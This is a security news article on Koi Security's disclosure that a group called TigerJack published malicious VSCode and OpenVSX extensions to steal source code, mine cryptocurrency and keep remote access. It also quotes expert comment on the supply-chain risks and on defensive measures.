In a new disclosure, security researchers revealed that a threat actor group called TigerJack has been publishing malicious extensions on Microsoft’s Visual Studio Code (VSCode) Marketplace and the OpenVSX registry to steal source code, plant cryptominers, and maintain remote access.
According to Koi Security’s findings, two of the campaign’s popular extensions – “C++ Payground” and “HTTP Format” – were removed after accumulating over 17,000 downloads, but the operation continues through re-uploads under fresh accounts.
“These extensions remain fully operational in the OpenVSX marketplace (used by Cursor, Windsurf, and other VS Code-compatible IDEs), continuing to steal code and mine cryptocurrency months after their removal from Microsoft’s platform,” Koi researchers said in a blog post.
Researchers have flagged it to be a coordinated campaign spanning at least 11 extensions across 3 different publisher accounts (ab-498,498 and 498-00).
Trojanized extensions built for persistence
Koi’s analysis shows that each malicious extension serves a distinct role in TigerJack’s campaign. One version quietly uploads a developer’s source code to external endpoints, another uses local resources for cryptomining, and the most “sophisticated” variant can execute JavaScript remotely without needing fresh updates for expanding or changing functionalities.
Aditya Sood, VP of Security Engineering and AI Strategy at Aryaka, thinks the last capability is particularly dangerous, allowing TigerJack to push payloads such as credential stealers, ransomware, or API-harvesting scripts at will, opening the door to long-term supply chain compromise.
Because the core payload execution is often handled via dynamic, remote JavaScript, rather than by shipping updated binaries, the extension’s visible version remains unchanged, making detection by static scanners or vetting systems far more difficult, researchers added. In some cases, the malicious packaging is cleverly designed with the extensions masquerading as legitimate or popular tools that attackers even silently installed (on top of the malicious functionality) to avoid suspicion.
In essence, the campaign blends two capabilities, cryptomining and persistent backdoor control. In the mining variants, the extension deploys a miner that quietly consumes CPU (and sometimes GPU) cycles on developer machines, abusing the host’s processing power into illicit cryptocurrency generation.
Coordinated multi-account operation
Koi researchers found 11 extensions across multiple accounts, making it a coordinated operation.
“This multi-account strategy provides redundancy when one account gets flagged, creates the illusion of independent developers, and demonstrates professional-level social engineering: GitHub repositories for credibility, consistent branding across extensions, detailed feature lists, professional marketplace presentations, and strategic naming that mimics legitimate tools (cppformat, pythonformat, httpformat),” the researchers said.
The analysis traced the malicious GitHub accounts back to a Facebook profile under the name “Zubaer Ahmed,” pointing to a likely operational slip that exposed the attacker’s real identity. The profile has since been taken down.
For developers and organizations relying heavily on VSCode or OpenVSX, the extensions could compromise not just a codebase but entire build environments or deployment pipelines, Sood noted. Compromised extensions can silently exfiltrate or tamper with source code that later moves into production, effectively turning VSCode into a vector for software supply-chain attacks. In collaborative environments, a single infected deployment could compromise shared repositories or inject backdoors into dependencies.
Koi researchers emphasized that TigerJack’s re-emergence reveals a deeper weakness in the extension ecosystem, with developer tools still relying on reputation and user ratings, rather than code auditing or signed binaries. “OpenVSX and other alternative marketplaces appear to have virtually no security detection mechanisms in place,” they said. “While Microsoft eventually identifies threats after months of damage, these platforms operate with minimal or no malware scanning whatsoever.”
Individuals using either of the impacted platforms should vet their extensions thoroughly and only download packages from reputable sources, Sood added. “Additionally, users should implement security measures that can raise alarms about potential vulnerabilities so users have the opportunity to close them before they’re exploited.”
No Responses